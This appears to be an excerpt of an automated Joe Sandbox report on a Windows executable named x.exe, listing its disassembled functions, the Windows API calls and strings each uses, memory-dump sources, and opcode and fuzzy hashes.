                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                    • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                    • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                                                    • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                    • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                                                    Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                    • API String ID: 0-1603158881
                                                                                                                                                    • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                    • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                                                    • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                    • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                                                    Function 00401CB0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 240COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                                    • String ID: close all$Wu
                                                                                                                                                    • API String ID: 4174999648-1790509019
                                                                                                                                                    • Opcode ID: 0bb321770139098455153e9cf500394e2a6da35f1d00dd0e11ea7e6d1323a696
                                                                                                                                                    • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                                                    • Opcode Fuzzy Hash: 0bb321770139098455153e9cf500394e2a6da35f1d00dd0e11ea7e6d1323a696
                                                                                                                                                    • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                                                    Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateMenu.USER32 ref: 00448603
                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                                                    • IsMenu.USER32(?), ref: 004486AB
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                                                    • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 161812096-4108050209
                                                                                                                                                    • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                    • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                                                    • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                                                    • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                                                    Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\AppData\Local\Temp\x.exe), ref: 00434057
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                                                    • _wprintf.LIBCMT ref: 004340A1
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                                                    Strings
                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\x.exe, xrefs: 00434040
                                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                    • API String ID: 3648134473-3922646890
                                                                                                                                                    • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                                    • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                                                    • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                                    • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                                                    Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 78813ac5c5779212d88e11dbc4805cbe96c27163f172e50d1cd09915c6bfa1a3
                                                                                                                                                    • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                                                    • Opcode Fuzzy Hash: 78813ac5c5779212d88e11dbc4805cbe96c27163f172e50d1cd09915c6bfa1a3
                                                                                                                                                    • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                                                    Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                                    • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                                                                    • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                                                    • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                                                                    Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\x.exe,0040F545,C:\Users\user\AppData\Local\Temp\x.exe,004A90E8,C:\Users\user\AppData\Local\Temp\x.exe,?,0040F545), ref: 0041013C
                                                                                                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 978794511-0
                                                                                                                                                    • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                                    • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                                                                    • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                                                    • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                                                                    Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                    • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                                                    • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                                                    • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                                                    Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                    • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                    • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                                                    • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                                                    • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                                                    Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$_memcmp
                                                                                                                                                    • String ID: '$\$h
                                                                                                                                                    • API String ID: 2205784470-1303700344
                                                                                                                                                    • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                                                    • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                                                                    • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                                                    • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                                                                    Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                                                    • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                                                    • __swprintf.LIBCMT ref: 0045EC33
                                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                                                    Strings
                                                                                                                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                                    • API String ID: 2441338619-1568723262
                                                                                                                                                    • Opcode ID: f183c9f019c246951a22bf959abcf8646146e2a0098e96658a8d7f803f4cbf54
                                                                                                                                                    • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                                                    • Opcode Fuzzy Hash: f183c9f019c246951a22bf959abcf8646146e2a0098e96658a8d7f803f4cbf54
                                                                                                                                                    • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                                                    Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                    • String ID: @COM_EVENTOBJ
                                                                                                                                                    • API String ID: 327565842-2228938565
                                                                                                                                                    • Opcode ID: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
                                                                                                                                                    • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                                                    • Opcode Fuzzy Hash: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
                                                                                                                                                    • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                                                    Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                                                                    • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                                                                      • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                                                                      • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
